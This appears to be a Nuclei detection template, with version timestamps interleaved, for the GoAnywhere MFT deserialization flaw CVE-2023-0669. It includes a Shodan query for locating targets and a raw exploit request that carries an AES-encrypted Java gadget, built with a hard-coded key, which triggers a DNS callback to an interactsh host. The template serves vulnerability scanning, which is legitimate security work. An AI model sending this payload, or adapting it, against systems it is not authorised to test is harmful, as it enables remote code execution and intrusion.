2023-02-10 14:50:32 +00:00
id : CVE-2023-0669
info :
name : GoAnywhere MFT - Remote Code Execution (ZeroDay)
author : rootxharsh,iamnoooob,dhiyaneshdk,pdresearch
2023-02-16 08:30:30 +00:00
severity : high
2023-02-10 14:50:32 +00:00
description : |
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.
reference :
- https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html
- https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1
- https://infosec.exchange/@briankrebs/109795710941843934
- https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
2023-02-16 08:30:30 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2023-0669
cwe-id : CWE-502
2023-02-10 14:50:32 +00:00
metadata :
shodan-query : http.favicon.hash:1484947000
2023-02-10 15:06:55 +00:00
verified : "true"
2023-02-10 16:02:02 +00:00
tags : cve,cve2023,rce,goanywhere,oast,kev
2023-02-10 14:50:32 +00:00
requests :
- raw :
- |
POST /goanywhere/lic/accept HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Content-Type : application/x-www-form-urlencoded
bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}}
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
- type : word
part : body
words :
- 'GoAnywhere'
- type : status
status :
- 500
